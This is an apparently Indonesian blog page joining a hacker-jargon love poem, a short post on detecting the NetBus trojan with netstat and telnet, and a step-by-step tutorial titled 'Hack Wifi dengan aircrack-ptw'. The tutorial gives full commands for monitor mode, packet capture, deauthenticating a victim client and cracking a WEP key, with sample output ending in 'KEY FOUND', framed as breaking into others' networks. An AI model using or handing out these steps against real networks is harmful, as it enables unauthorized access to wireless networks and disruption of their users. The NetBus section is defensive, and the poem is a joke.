saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system,
jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, …?
Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.
Mendeteksi dan Menghilangkan Netbus
Diposting oleh jhon sutaker Rabu, 21 Juli 2010c:\netstat -an | find “12345″
c:\telnet
Pada menu Connect pilih Remote Systems. Akan muncul kotak dialog. Isikan localhost pada Host Name dan 12345 pada Port. Klik Connect. Jika memang pada komputer tersebut terdapat NetBus maka pada telnet akan muncul tulisan NetBus 1.70.
Cara lain untuk mendeteksi dan menghilangkan keberadaan NetBus dan program-program semacamnya Anda bisa menggunakan Anti Virus dengan update terbaru.
Hack Wifi dengan aircrack-ptw
Diposting oleh jhon sutakerACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kalau pake “stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0″
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Step 2 : Start wireless card
$ airmon-ng start wifi0
“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng –channel X –write prefix_for_capture_file interface
misal
$ sudo airodump-ng –channel 3 –write tes ath0
“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”
http://hackcenter.wordpress.com/2010/02/07/hack-wifi-dengan-aircrack-ptw/
